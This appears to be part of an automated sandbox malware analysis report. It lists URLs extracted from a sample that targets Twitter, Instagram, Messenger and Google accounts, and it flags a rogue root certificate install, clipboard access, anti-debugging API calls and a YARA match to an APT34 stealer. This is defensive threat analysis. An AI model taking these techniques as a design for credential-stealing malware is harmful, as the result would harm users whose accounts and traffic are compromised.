Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqj5
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4zuiC
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601452923&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/OldConvergedLogin_PCore_xqcDwEKeDux9oCNjuqEZ-A2.js
Source: 56BB1610C0318054.exe	String found in binary or memory: https://mail.google.com/mail
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://mail.google.com/mail/#settings
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: 56BB1610C0318054.exe	String found in binary or memory: https://payments.google.com/
Source: 56BB1610C0318054.exe	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://pki.goog/repository/0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 56BB1610C0318054.exe	String found in binary or memory: https://sandbox.google.com/
Source: 56BB1610C0318054.exe	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 56BB1610C0318054.exe	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: Web Data1611971454381.2.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Web Data1611971454381.2.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 56BB1610C0318054.exe, 00000002.00000003.276872790.0000000003100000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 56BB1610C0318054.exe, 00000002.00000003.276872790.0000000003100000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_divxpt
Source: 56BB1610C0318054.exe, 00000002.00000003.277190351.000000000318F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 56BB1610C0318054.exe, 00000002.00000003.277158883.0000000003117000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_java
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000002.00000003.329732369.000000000311B000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 56BB1610C0318054.exe, 00000002.00000003.277158883.0000000003117000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 56BB1610C0318054.exe, 00000002.00000003.277190351.000000000318F000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/ookie:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comReferer:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000002.00000003.329852304.0000000002ABC000.00000004.00000040.sdmp, 56BB1610C0318054.exe, 00000004.00000003.259393537.0000000002F48000.00000004.00000001.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp, ecvD64F.tmp.8.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp, ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprint
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN
Source: Web Data1611971454381.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	String found in binary or memory: https://www.google.com;
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.googleapis.com/auth/calend
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/calendar.readonlyAPL
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/clouddevicesaP
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.googleapis.com/auth/h
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/hangoutsrx=n
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 56BB1610C0318054.exe	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteu
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.258580370.0000000002F47000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259047142.0000000002F70000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000003.258939900.0000000002F4E000.00000004.00000001.sdmp	String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvD64F.tmp.8.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 56BB1610C0318054.exe, 56BB1610C0318054.exe, 00000004.00000003.259051074.0000000002F74000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accept:
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: 56BB1610C0318054.exe, 00000002.00000002.334760823.000000000346C000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.263757994.00000000032BC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\AppData\Roaming\1611971443428.exe

Code function: 8_2_0040AE4D OpenClipboard,

E-Banking Fraud:

Registers a new ROOT certificate

Show sources

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 2.2.56BB1610C0318054.exe.32a0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.56BB1610C0318054.exe.30f0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown

PE file has a writeable .text section

Show sources

Source: Cyfj6XGbkd.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 56BB1610C0318054.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,
Source: C:\Users\user\AppData\Roaming\1611971443428.exe	Code function: 8_2_0040C516 NtQuerySystemInformation,
Source: C:\Users\user\AppData\Roaming\1611971443428.exe	Code function: 8_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe

Code function: 0_2_00403660: DeviceIoControl,

Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_00403E2C
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_00404050
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_004093D5
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_00403FA9
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000C063
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000B883
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_100060F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_100169BD
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_100099E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_100071F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10009257
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10010AED
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10008340
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000E380
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000ABA0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000B3B0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1001EBD0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_100083F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000BC57
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000C483
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_10010590
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1001EDDB
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe	Code function: 0_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10009257
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10008340
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_10010590
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe	Code function: 2_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611971443428.exe	Code function: 8_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F4A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F4963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F46A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F4A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F49B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 28_2_00F4B51C

Source: Joe Sandbox View

